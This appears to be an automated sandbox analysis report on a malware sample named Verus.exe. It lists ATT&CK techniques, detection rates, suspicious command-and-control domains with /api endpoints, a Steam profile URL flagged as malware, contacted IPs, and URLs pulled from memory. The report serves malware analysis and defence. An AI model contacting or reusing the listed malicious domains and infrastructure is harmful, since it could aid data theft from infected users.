Email Addresses	DNS Server	Domain Accounts	1 Native API	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	41 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	2 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	1 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	25 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Verus.exe	8%	Virustotal		Browse

Source	Detection	Scanner	Link
condifendteu.sbs	18%	Virustotal	Browse
steamcommunity.com	0%	Virustotal	Browse
vennurviot.sbs	18%	Virustotal	Browse
drawwyobstacw.sbs	18%	Virustotal	Browse
ehticsprocw.sbs	16%	Virustotal	Browse
mathcucom.sbs	21%	Virustotal	Browse
enginenek.buzz	0%	Virustotal	Browse
resinedyw.sbs	18%	Virustotal	Browse
enlargkiw.sbs	18%	Virustotal	Browse
allocatinow.sbs	20%	Virustotal	Browse
sergei-esenin.com	18%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f	0%	URL Reputation	safe
https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f	0%	URL Reputation	safe
https://store.steampowered.com/subscriber_agreement/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	0%	URL Reputation	safe
http://www.valvesoftware.com/legal.htm	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	0%	URL Reputation	safe
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900	100%	URL Reputation	malware
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	0%	URL Reputation	safe
http://www.entrust.net/rpa03	0%	URL Reputation	safe
http://store.steampowered.com/privacy_agreement/	0%	URL Reputation	safe
https://store.steampowered.com/points/shop/	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900/inventory/	100%	URL Reputation	malware
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	0%	URL Reputation	safe
https://store.steampowered.com/privacy_agreement/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	0%	URL Reputation	safe
http://crl.entrust.net/2048ca.crl0	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	0%	URL Reputation	safe
https://store.steampowered.com/;	0%	URL Reputation	safe
https://www.entrust.net/rpa0	0%	URL Reputation	safe
https://store.steampowered.com/about/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net02	0%	URL Reputation	safe
https://help.steampowered.com/en/	0%	URL Reputation	safe
https://store.steampowered.com/news/	0%	URL Reputation	safe
http://store.steampowered.com/subscriber_agreement/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en	0%	URL Reputation	safe
https://store.steampowered.com/stats/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	0%	URL Reputation	safe
https://store.steampowered.com/steam_refunds/	0%	URL Reputation	safe
http://crl.entrust.net/ts1ca.crl0	0%	URL Reputation	safe
https://store.steampowered.com/legal/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl	0%	URL Reputation	safe
http://aia.entrust.net/ts1-chain256.cer01	0%	URL Reputation	safe
http://upx.sf.net	0%	URL Reputation	safe
https://store.steampowered.com/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif	0%	URL Reputation	safe
https://www.cloudflare.com/learning/access-management/phishing-attack/	0%	Virustotal		Browse
https://sergei-esenin.com/	0%	Virustotal		Browse
allocatinow.sbs	20%	Virustotal		Browse
enlargkiw.sbs	18%	Virustotal		Browse
https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp	0%	Virustotal		Browse
drawwyobstacw.sbs	18%	Virustotal		Browse
https://steamcommunity.com/?subsection=broadcasts	0%	Virustotal		Browse
mathcucom.sbs	21%	Virustotal		Browse
https://enginenek.buzz/api	8%	Virustotal		Browse
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi	0%	Virustotal		Browse
https://vennurviot.sbs/api	18%	Virustotal		Browse
ehticsprocw.sbs	16%	Virustotal		Browse
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a	0%	Virustotal		Browse
https://drawwyobstacw.sbs/api	18%	Virustotal		Browse
condifendteu.sbs	18%	Virustotal		Browse
https://mathcucom.sbs/	21%	Virustotal		Browse
https://community.akamai.steamstatic.com/public/css/skin_1/profilev	0%	Virustotal		Browse
https://steamcommunity.com/my/wishlist/	0%	Virustotal		Browse
https://allocatinow.sbs/api	20%	Virustotal		Browse
https://www.cloudflare.com/5xx-error-landing	0%	Virustotal		Browse
https://steamcommunity.com/market/	0%	Virustotal		Browse
https://steamcommunity.com/discussions/	0%	Virustotal		Browse
enginenek.buzz	0%	Virustotal		Browse
https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900	0%	Virustotal		Browse
https://resinedyw.sbs/	18%	Virustotal		Browse
http://www.FeyTools.com	0%	Virustotal		Browse
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	0%	Virustotal		Browse
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&l=e	0%	Virustotal		Browse
https://resinedyw.sbs/api	18%	Virustotal		Browse
https://vennurviot.sbs/apis	0%	Virustotal		Browse
https://steamcommunity.com/workshop/	0%	Virustotal		Browse
https://community.akamai.steamstatic.com/public/shared/css/shared_resp	0%	Virustotal		Browse
https://ehticsprocw.sbs/.	16%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
condifendteu.sbs	172.67.141.136	true	true	18%, Virustotal, Browse	unknown
steamcommunity.com	104.102.49.254	true	true	0%, Virustotal, Browse	unknown
vennurviot.sbs	172.67.140.193	true	true	18%, Virustotal, Browse	unknown
drawwyobstacw.sbs	188.114.97.3	true	true	18%, Virustotal, Browse	unknown
mathcucom.sbs	188.114.96.3	true	true	21%, Virustotal, Browse	unknown
enginenek.buzz	188.114.97.3	true	true	0%, Virustotal, Browse	unknown
sergei-esenin.com	104.21.53.8	true	true	18%, Virustotal, Browse	unknown
ehticsprocw.sbs	172.67.173.224	true	true	16%, Virustotal, Browse	unknown
resinedyw.sbs	172.67.205.156	true	true	18%, Virustotal, Browse	unknown
enlargkiw.sbs	172.67.152.13	true	true	18%, Virustotal, Browse	unknown
allocatinow.sbs	unknown	unknown	true	20%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
enlargkiw.sbs	true	18%, Virustotal, Browse	unknown
allocatinow.sbs	true	20%, Virustotal, Browse	unknown
drawwyobstacw.sbs	true	18%, Virustotal, Browse	unknown
mathcucom.sbs	true	21%, Virustotal, Browse	unknown
https://enginenek.buzz/api	true	8%, Virustotal, Browse	unknown
https://steamcommunity.com/profiles/76561199724331900	true	URL Reputation: malware	unknown
https://vennurviot.sbs/api	true	18%, Virustotal, Browse	unknown
ehticsprocw.sbs	true	16%, Virustotal, Browse	unknown
condifendteu.sbs	true	18%, Virustotal, Browse	unknown
https://drawwyobstacw.sbs/api	true	18%, Virustotal, Browse	unknown
enginenek.buzz	true	0%, Virustotal, Browse	unknown
https://resinedyw.sbs/api	true	18%, Virustotal, Browse	unknown
https://mathcucom.sbs/api	true		unknown
resinedyw.sbs	true		unknown
vennurviot.sbs	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.cloudflare.com/learning/access-management/phishing-attack/	Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp	Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f	Verus.exe, 00000000.00000003.1978794248.0000000000798000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://steamcommunity.com/?subsection=broadcasts	Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://sergei-esenin.com/	Verus.exe, 00000000.00000003.1978794248.00000000007A2000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://store.steampowered.com/subscriber_agreement/	Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	Verus.exe, 00000000.00000003.1978619279.0000000000830000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978684227.0000000000813000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.valvesoftware.com/legal.htm	Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://allocatinow.sbs/s	Verus.exe, 00000000.00000003.1899855227.00000000007B8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	Verus.exe, 00000000.00000002.2123122400.0000000000770000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi	Verus.exe, 00000000.00000003.1978619279.0000000000830000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978684227.0000000000813000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4Ok	Verus.exe, 00000000.00000002.2123122400.0000000000770000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamsta	Verus.exe, 00000000.00000002.2123122400.0000000000770000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.entrust.net/rpa03	Verus.exe	false	URL Reputation: safe	unknown
http://store.steampowered.com/privacy_agreement/	Verus.exe, 00000000.00000003.1978619279.0000000000830000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978684227.0000000000813000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akam	Verus.exe, 00000000.00000002.2123122400.0000000000770000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/points/shop/	Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199724331900/inventory/	Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978684227.0000000000813000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978684227.0000000000813000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/privacy_agreement/	Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.cloudflare.com/5xx-error-landing	Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978684227.0000000000805000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en	Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/profilev	Verus.exe, 00000000.00000002.2123122400.0000000000770000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.micK)	Verus.exe, 00000000.00000003.1919482655.00000000007A2000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a	Verus.exe, 00000000.00000003.1978619279.0000000000830000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978684227.0000000000813000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://mathcucom.sbs/	Verus.exe, 00000000.00000003.1899855227.00000000007B8000.00000004.00000020.00020000.00000000.sdmp	false	21%, Virustotal, Browse	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am	Verus.exe, 00000000.00000002.2123122400.0000000000770000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	Verus.exe, 00000000.00000002.2123122400.0000000000770000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	Verus.exe, 00000000.00000002.2123122400.0000000000770000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png	Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.entrust.net/2048ca.crl0	Verus.exe	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/;	Verus.exe, 00000000.00000003.1978794248.0000000000798000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.entrust.net/rpa0	Verus.exe	false	URL Reputation: safe	unknown
https://store.steampowered.com/about/	Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/my/wishlist/	Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english	Verus.exe, 00000000.00000002.2123122400.0000000000770000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ocsp.entrust.net03	Verus.exe	false	URL Reputation: safe	unknown
http://ocsp.entrust.net02	Verus.exe	false	URL Reputation: safe	unknown
https://help.steampowered.com/en/	Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/market/	Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://store.steampowered.com/news/	Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://store.steampowered.com/subscriber_agreement/	Verus.exe, 00000000.00000003.1978619279.0000000000830000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978684227.0000000000813000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://allocatinow.sbs/api	Verus.exe, 00000000.00000003.1899855227.00000000007B8000.00000004.00000020.00020000.00000000.sdmp	false	20%, Virustotal, Browse	unknown
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	Verus.exe, 00000000.00000003.1978619279.0000000000830000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978684227.0000000000813000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1	Verus.exe, 00000000.00000002.2123122400.0000000000770000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en	Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.FeyTools.com	Verus.exe	false	0%, Virustotal, Browse	unknown
https://steamcommunity.com/discussions/	Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://store.steampowered.com/stats/	Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	Verus.exe, 00000000.00000003.1978619279.0000000000830000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978684227.0000000000813000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/steam_refunds/	Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://resinedyw.sbs/	Verus.exe, 00000000.00000003.1919482655.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000002.2123122400.000000000074E000.00000004.00000020.00020000.00000000.sdmp	false	18%, Virustotal, Browse	unknown
https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900	Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://vennurviot.sbs/apis	Verus.exe, 00000000.00000003.1938818608.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978794248.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1919482655.00000000007A2000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://ehticsprocw.sbs/.	Verus.exe, 00000000.00000003.1938818608.00000000007A2000.00000004.00000020.00020000.00000000.sdmp	false	16%, Virustotal, Browse	unknown
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&l=e	Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://sergei-esenin.com:443/apita	Verus.exe, 00000000.00000002.2123122400.0000000000796000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crl.entrust.net/ts1ca.crl0	Verus.exe	false	URL Reputation: safe	unknown
https://steamcommunity.com/workshop/	Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://store.steampowered.com/legal/	Verus.exe, 00000000.00000003.1978619279.0000000000830000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978684227.0000000000813000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e	Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://allocatinow.sbs/a	Verus.exe, 00000000.00000003.1899855227.00000000007B8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_resp	Verus.exe, 00000000.00000002.2123122400.0000000000770000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv	Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl	Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://sergei-esenin.com/api/Tew	Verus.exe, 00000000.00000002.2123122400.000000000074E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://drawwyobstacw.sbs/api7j	Verus.exe, 00000000.00000003.1978794248.00000000007A2000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://aia.entrust.net/ts1-chain256.cer01	Verus.exe	false	URL Reputation: safe	unknown
http://upx.sf.net	Amcache.hve.6.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.coD	Verus.exe, 00000000.00000002.2123122400.0000000000770000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://drawwyobstacw.sbs/api/	Verus.exe, 00000000.00000003.1978794248.00000000007A2000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/	Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw	Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3v/	Verus.exe, 00000000.00000002.2123122400.0000000000770000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif	Verus.exe, 00000000.00000003.1978619279.0000000000830000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978619279.0000000000833000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1978684227.0000000000813000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://vennurviot.sbs/q	Verus.exe, 00000000.00000003.1919567479.00000000007E1000.00000004.00000020.00020000.00000000.sdmp, Verus.exe, 00000000.00000003.1919482655.00000000007A2000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.53.8	sergei-esenin.com	United States	13335	CLOUDFLARENETUS	true
188.114.97.3	drawwyobstacw.sbs	European Union	13335	CLOUDFLARENETUS	true
172.67.173.224	ehticsprocw.sbs	United States	13335	CLOUDFLARENETUS	true
188.114.96.3	mathcucom.sbs	European Union	13335	CLOUDFLARENETUS	true
